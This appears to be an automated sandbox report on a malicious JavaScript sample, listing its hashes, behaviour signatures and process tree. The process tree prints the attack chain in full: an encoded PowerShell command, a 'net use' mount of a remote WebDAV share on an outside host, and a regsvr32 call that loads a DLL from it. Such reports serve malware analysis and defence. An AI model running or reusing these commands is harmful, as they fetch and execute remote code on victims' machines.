Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
21-08-2024 15:57
Static task
static1
Behavioral task
behavioral1
Sample
a4d988e16af841243a863f4e0b905431c9e6d66b9746657e259e6b13db75db25.js
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
a4d988e16af841243a863f4e0b905431c9e6d66b9746657e259e6b13db75db25.js
Resource
win10v2004-20240802-en
General
-
Target
a4d988e16af841243a863f4e0b905431c9e6d66b9746657e259e6b13db75db25.js
-
Size
13KB
-
MD5
c0ed197aef6e402ba2f1f286ef7a5e0b
-
SHA1
50dddbc2aad2e5c20f84b146718aae109ac184bc
-
SHA256
a4d988e16af841243a863f4e0b905431c9e6d66b9746657e259e6b13db75db25
-
SHA512
6fb36968dbc7a00471258f2df63a7adacafca53d7750f199c440fb502a7fa3d0b27c208de824792b9107b1dc11df6c4acbe5038ae897d98258c9f27fa331bd7f
-
SSDEEP
96:6To/qCXep9vYcV9YDuHDwDQDmFouDylnCDoDnDVLD5ouDylnCDoDnDiND:1qCu9nV9YKHccwWlnCkDRLrWlnCkDm5
Malware Config
Signatures
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2828 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2828 powershell.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 2776 wrote to memory of 2828 2776 wscript.exe 30 PID 2776 wrote to memory of 2828 2776 wscript.exe 30 PID 2776 wrote to memory of 2828 2776 wscript.exe 30 PID 2828 wrote to memory of 2716 2828 powershell.exe 32 PID 2828 wrote to memory of 2716 2828 powershell.exe 32 PID 2828 wrote to memory of 2716 2828 powershell.exe 32 PID 2828 wrote to memory of 2616 2828 powershell.exe 33 PID 2828 wrote to memory of 2616 2828 powershell.exe 33 PID 2828 wrote to memory of 2616 2828 powershell.exe 33 PID 2828 wrote to memory of 2616 2828 powershell.exe 33 PID 2828 wrote to memory of 2616 2828 powershell.exe 33
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\a4d988e16af841243a863f4e0b905431c9e6d66b9746657e259e6b13db75db25.js1⤵
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABkAGEAaQBsAHkAdwBlAGIAcwB0AGEAdABzAC4AYwBvAG0AQAA4ADgAOAA4AFwAZABhAHYAdwB3AHcAcgBvAG8AdABcACAAOwAgAHIAZQBnAHMAdgByADMAMgAgAC8AcwAgAFwAXABkAGEAaQBsAHkAdwBlAGIAcwB0AGEAdABzAC4AYwBvAG0AQAA4ADgAOAA4AFwAZABhAHYAdwB3AHcAcgBvAG8AdABcADMAMwA5ADgAMwAyADUAMwAxADQAMAA2ADgALgBkAGwAbAA=2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\dailywebstats.com@8888\davwwwroot\3⤵PID:2716
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s \\dailywebstats.com@8888\davwwwroot\3398325314068.dll3⤵PID:2616
-
-